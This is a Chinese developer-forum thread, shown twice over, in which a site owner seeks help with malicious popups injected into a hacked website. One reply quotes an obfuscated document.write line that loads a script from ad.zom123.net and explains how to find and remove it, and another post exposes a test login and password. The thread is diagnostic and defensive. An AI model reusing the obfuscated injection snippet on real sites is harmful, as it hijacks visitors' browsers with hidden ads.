网站:http://www.gykcjz.cn/
我是菜鸟,看了首页源代码,没找到代码加哪里了就来到藏龙卧虎的csdn求助,还望望大神指点
13 个解决方案
#1
请给出真实的 url
#2
就是 www.gykcjz.cn 这个网址,我的网站服务器被黑后不是很正常,有时候会打不开
打开后你等一会就回发现有弹窗
#3
弹出下面的一些页面
#4
这个 阅读3分钟的弹框我经常遇到,
#5
打开块10分钟了,没遇到你说的情况,我看搞不好是你们公司的网络被劫持了。 建议你用手机4G网络打开这个网站看看会不会出现你说的情况。
#6
用手机4G网络打开这个网站没有弹窗
#7
4月28号,空间商说机房维护,停了10多个小时,后来发现打开网站首页时不再弹出弹窗,登录时等会,会弹出弹窗
测试账号: ceshi 密码:123456
并且登录时我通过抓包发现一些问题
测试账号: ceshi 密码:123456
并且登录时我通过抓包发现一些问题
#8
查到的一些文件
最近看到朋友的网站第一次访问的时候会转向到ad.zom123.net这个网址,然后弹窗窗口,还以为我电脑中病毒了,后面在网上查找好像有很多都有ad.zom123.net这个问题。
出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码
-JavaScript
document.write('<sc'+'ript src="<\/sc'+'ript>'">http://%61d'+'.%7ao'+'m1'+'2%33'+'.ne'+'t/ip'+'.asp?'+'c=tianjin|vietnam"><\/sc'+'ript>');
这个广告代码是动态插入的,直接查看源文件无法找到,需要借助firebug或者ie8+的开发者调试工具才能发现。
此广告代码,是自动判断IP段的,所以有些站点站长自己无法检查到。
修复
查找公用的js文件,看是否存在上面的代码,一般是插入在js文件的最后。在确保你的ftp账户是安全的并且服务器没有被黒入的情况下,这个问题那就可能是网站漏洞了,被上传了木马,被掌握的fso权限。如果是fso权限被掌握了,最好好的办法就是将公用的文件,包括js,inlude进来的文件的写入权限去掉,这样可以保证不被fso修改文件。
最近看到朋友的网站第一次访问的时候会转向到ad.zom123.net这个网址,然后弹窗窗口,还以为我电脑中病毒了,后面在网上查找好像有很多都有ad.zom123.net这个问题。
出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码
-JavaScript
document.write('<sc'+'ript src="<\/sc'+'ript>'">http://%61d'+'.%7ao'+'m1'+'2%33'+'.ne'+'t/ip'+'.asp?'+'c=tianjin|vietnam"><\/sc'+'ript>');
这个广告代码是动态插入的,直接查看源文件无法找到,需要借助firebug或者ie8+的开发者调试工具才能发现。
此广告代码,是自动判断IP段的,所以有些站点站长自己无法检查到。
修复
查找公用的js文件,看是否存在上面的代码,一般是插入在js文件的最后。在确保你的ftp账户是安全的并且服务器没有被黒入的情况下,这个问题那就可能是网站漏洞了,被上传了木马,被掌握的fso权限。如果是fso权限被掌握了,最好好的办法就是将公用的文件,包括js,inlude进来的文件的写入权限去掉,这样可以保证不被fso修改文件。
#9
解决了吗???
#10
目前还是会弹框的,貌似比XSS高级啊
#11
找到 js/common.js中的下面代码删除
ASCII
ASCII
#12
今天早上一打开网站发现还有弹窗
最后抓包一看
hzs21.cnzz.com cnzz域名的泛解析
删除统计代码,发现弹出不在出现
最后抓包一看
hzs21.cnzz.com cnzz域名的泛解析
删除统计代码,发现弹出不在出现
#13
应该是解决了,帮忙看看还有弹窗吗?
#1
请给出真实的 url
#2
就是 www.gykcjz.cn 这个网址,我的网站服务器被黑后不是很正常,有时候会打不开
打开后你等一会就回发现有弹窗
#3
弹出下面的一些页面
#4
这个 阅读3分钟的弹框我经常遇到,
#5
打开块10分钟了,没遇到你说的情况,我看搞不好是你们公司的网络被劫持了。 建议你用手机4G网络打开这个网站看看会不会出现你说的情况。
#6
用手机4G网络打开这个网站没有弹窗
#7
4月28号,空间商说机房维护,停了10多个小时,后来发现打开网站首页时不再弹出弹窗,登录时等会,会弹出弹窗
测试账号: ceshi 密码:123456
并且登录时我通过抓包发现一些问题
测试账号: ceshi 密码:123456
并且登录时我通过抓包发现一些问题
#8
查到的一些文件
最近看到朋友的网站第一次访问的时候会转向到ad.zom123.net这个网址,然后弹窗窗口,还以为我电脑中病毒了,后面在网上查找好像有很多都有ad.zom123.net这个问题。
出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码
-JavaScript
document.write('<sc'+'ript src="<\/sc'+'ript>'">http://%61d'+'.%7ao'+'m1'+'2%33'+'.ne'+'t/ip'+'.asp?'+'c=tianjin|vietnam"><\/sc'+'ript>');
这个广告代码是动态插入的,直接查看源文件无法找到,需要借助firebug或者ie8+的开发者调试工具才能发现。
此广告代码,是自动判断IP段的,所以有些站点站长自己无法检查到。
修复
查找公用的js文件,看是否存在上面的代码,一般是插入在js文件的最后。在确保你的ftp账户是安全的并且服务器没有被黒入的情况下,这个问题那就可能是网站漏洞了,被上传了木马,被掌握的fso权限。如果是fso权限被掌握了,最好好的办法就是将公用的文件,包括js,inlude进来的文件的写入权限去掉,这样可以保证不被fso修改文件。
最近看到朋友的网站第一次访问的时候会转向到ad.zom123.net这个网址,然后弹窗窗口,还以为我电脑中病毒了,后面在网上查找好像有很多都有ad.zom123.net这个问题。
出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码
-JavaScript
document.write('<sc'+'ript src="<\/sc'+'ript>'">http://%61d'+'.%7ao'+'m1'+'2%33'+'.ne'+'t/ip'+'.asp?'+'c=tianjin|vietnam"><\/sc'+'ript>');
这个广告代码是动态插入的,直接查看源文件无法找到,需要借助firebug或者ie8+的开发者调试工具才能发现。
此广告代码,是自动判断IP段的,所以有些站点站长自己无法检查到。
修复
查找公用的js文件,看是否存在上面的代码,一般是插入在js文件的最后。在确保你的ftp账户是安全的并且服务器没有被黒入的情况下,这个问题那就可能是网站漏洞了,被上传了木马,被掌握的fso权限。如果是fso权限被掌握了,最好好的办法就是将公用的文件,包括js,inlude进来的文件的写入权限去掉,这样可以保证不被fso修改文件。
#9
解决了吗???
#10
目前还是会弹框的,貌似比XSS高级啊
#11
找到 js/common.js中的下面代码删除
ASCII
ASCII
#12
今天早上一打开网站发现还有弹窗
最后抓包一看
hzs21.cnzz.com cnzz域名的泛解析
删除统计代码,发现弹出不在出现
最后抓包一看
hzs21.cnzz.com cnzz域名的泛解析
删除统计代码,发现弹出不在出现
#13
应该是解决了,帮忙看看还有弹窗吗?